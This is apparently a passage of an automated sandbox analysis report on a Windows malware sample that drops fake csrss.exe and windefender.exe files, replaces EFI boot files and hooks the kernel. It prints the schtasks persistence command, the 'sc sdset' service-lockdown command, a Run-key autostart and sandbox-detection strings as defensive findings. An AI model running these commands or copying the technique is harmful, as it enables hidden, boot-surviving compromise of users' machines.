            Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: EfiGuardDxe.pdb source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000026.00000002.427962622.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: dbghelp.pdb source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: dbghelp.pdbGCTL source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: f6oNLRKHUy.exeStatic PE information: section name: UPX2
            Source: csrss.exe.3.drStatic PE information: section name: UPX2
            Source: windefender.exe.8.drStatic PE information: section name: UPX2
            Source: injector.exe.8.drStatic PE information: section name: _RDATA
            Source: bootx64.efi.8.drStatic PE information: section name: .xdata
            Source: NtQuerySystemInformationHook.dll.8.drStatic PE information: section name: _RDATA
            Source: EfiGuardDxe.efi.8.drStatic PE information: section name: .xdata
            Source: bootmgfw.efi.8.drStatic PE information: section name: .xdata
            Source: windefender.exe.8.drStatic PE information: real checksum: 0x0 should be: 0x20ae45
            Source: NtQuerySystemInformationHook.dll.8.drStatic PE information: real checksum: 0x0 should be: 0x2279d
            Source: bootmgfw.efi.8.drStatic PE information: real checksum: 0x2199 should be: 0x4c78
            Source: bootx64.efi.8.drStatic PE information: real checksum: 0x2199 should be: 0x4c78
            Source: f6oNLRKHUy.exeStatic PE information: real checksum: 0x0 should be: 0x3a37d7
            Source: csrss.exe.3.drStatic PE information: real checksum: 0x0 should be: 0x3a37d7
            Source: EfiGuardDxe.efi.8.drStatic PE information: real checksum: 0x4a5a6 should be: 0x51a75
            Source: injector.exe.8.drStatic PE information: real checksum: 0x0 should be: 0x54ea2
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1

            Persistence and Installation Behavior:

            barindex
            Creates files in the system32 config directoryShow sources
            Source: C:\Windows\System32\netsh.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\PeerDistRepubJump to behavior
            Drops executables to the windows directory (C:\Windows) and starts themShow sources
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeExecutable created and started: C:\Windows\rss\csrss.exeJump to behavior
            Source: unknownExecutable created and started: C:\Windows\windefender.exe
            Drops PE files with benign system namesShow sources
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeFile created: C:\Windows\rss\csrss.exeJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Boot\bootx64.efiJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Boot\EfiGuardDxe.efiJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Microsoft\Boot\bootmgfw.efiJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: B:\EFI\Boot\old.efi (copy)Jump to dropped file
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeFile created: C:\Windows\rss\csrss.exeJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Boot\EfiGuardDxe.efiJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Boot\bootx64.efiJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\Windows\windefender.exeJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Microsoft\Boot\bootmgfw.efiJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: B:\EFI\Microsoft\Boot\fw.efi (copy)Jump to dropped file
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeFile created: C:\Windows\rss\csrss.exeJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\Windows\windefender.exeJump to dropped file

            Boot Survival:

            barindex
            Creates an autostart registry key pointing to binary in C:\WindowsShow sources
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FragrantButterflyJump to behavior
            Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR 'C:\Windows\rss\csrss.exe' /TN csrss /F
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FragrantButterflyJump to behavior
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FragrantButterflyJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

            Hooking and other Techniques for Hiding and Protection:

            barindex
            May modify the system service descriptor table (often done to hook functions)Show sources
            Source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\windefender.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\windefender.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\windefender.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\windefender.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: TOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PARAMETER WITH GC PROG
            Source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD RST MARKERBAD ALLOCCOUNTBAD RECORD MACBAD SPAN STATEBAD STACK SIZEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDEXIT STATUS -1FILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDLOOKUP TXT: %WMEMPROFILERATENEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREPORT_ID IS 0RUNTIME: BASE=RUNTIME: FULL=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIMEENDPERIODTOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PARAMETER WITH GC PROG
            Source: f6oNLRKHUy.exe, 00000003.00000002.371702549.0000000011852000.00000004.00000001.sdmpBinary or memory string: VMUSRVC.EXE
            Source: csrss.exeBinary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETESTING KEYTTL EXPIREDVBOXSERVICEVMUSRVC.EXEVT_RESERVEDVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEALARM CLOCKAPPLICATIONBAD ADDRESSBAD MESSAGE
            Source: f6oNLRKHUy.exe, 00000003.00000002.372206194.00000000118D0000.00000004.00000001.sdmpBinary or memory string: VMSRVC.EXESVCHOST.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESPOOLSV.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXE
            Source: f6oNLRKHUy.exe, 00000003.00000002.372349315.00000000118F6000.00000004.00000001.sdmpBinary or memory string: SVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESIHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXECTFMON.EXEVMSRVC.EXEVMUSRVC.EXEEXPLORER.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEDLLHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESEARCHUI.EXESEARCHUI.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEHXTSR.EXEHXTSR.EXEMVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEWMIPRVSE.EXEWMIPRVSE.EXEVMSRVC.EXEVMUSRVC.EXEDLLHOST.EXEVMSRVC.EXEVMUSRVC.EXEWMIPRVSE.EXEWMIPRVSE.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESGRMBROKER.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEWMIPRVSE.EXEWMIPRVSE.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXE
            Source: f6oNLRKHUy.exe, 00000003.00000002.371702549.0000000011852000.00000004.00000001.sdmpBinary or memory string: VMSRVC.EXEVMUSRVC.EXESMSS.EXEVMSRVC.EXEVMUSRVC.EXECSRSS.EXEVMSRVC.EXEVMUSRVC.EXEWININIT.EXEVMSRVC.EXEVMUSRVC.EXECSRSS.EXEVMSRVC.EXEVMUSRVC.EXESERVICES.EXEVMSRVC.EXEVMUSRVC.EXEWINLOGON.EXEVMSRVC.EXEVMUSRVC.EXELSASS.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEDWM.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXECONHOST.EXEVMSRVC.EXEVMUSRVC.EXEUSOCLIENT.EXEUSOCLIENT.EXEVMSRVC.EXEVMUSRVC.EXEUSOCLIENT.EXEUSOCLIENT.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEDLLHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEF6ONLRKHUY.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEF6ONLRKHUY.EXEVMSRVC.EXEVMUSRVC.EXEVPC-S3VPCUHUB$
            Source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETESTING KEYTTL EXPIREDVBOXSERVICEVMUSRVC.EXEVT_RESERVEDVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEALARM CLOCKAPPLICATIONBAD ADDRESSBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCOMPAIGN_IDCREATED BY CRYPT32.DLLDNSMESSAGE.E2.KEFF.ORGEMBEDDED/%SFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEHTTPS_PROXYI/O TIMEOUTLOCAL ERRORLOST MCACHEMSPANMANUALMETHODARGS(MSWSOCK.DLLNEXT SERVERNIL CONTEXTORANNIS.COMPARSE ERRORPROCESS: %SRAW-CONTROLREFLECT.SETRETRY-AFTERRUNTIME: P RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITETASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION=183WININET.DLLWUP_PROCESS (SENSITIVE) [RECOVERED] ALLOCCOUNT FOUND AT *( GCSCANDONE M->GSIGNAL= MINTRIGGER= NDATAROOTS= NSPANROOTS= PAGES/BYTE
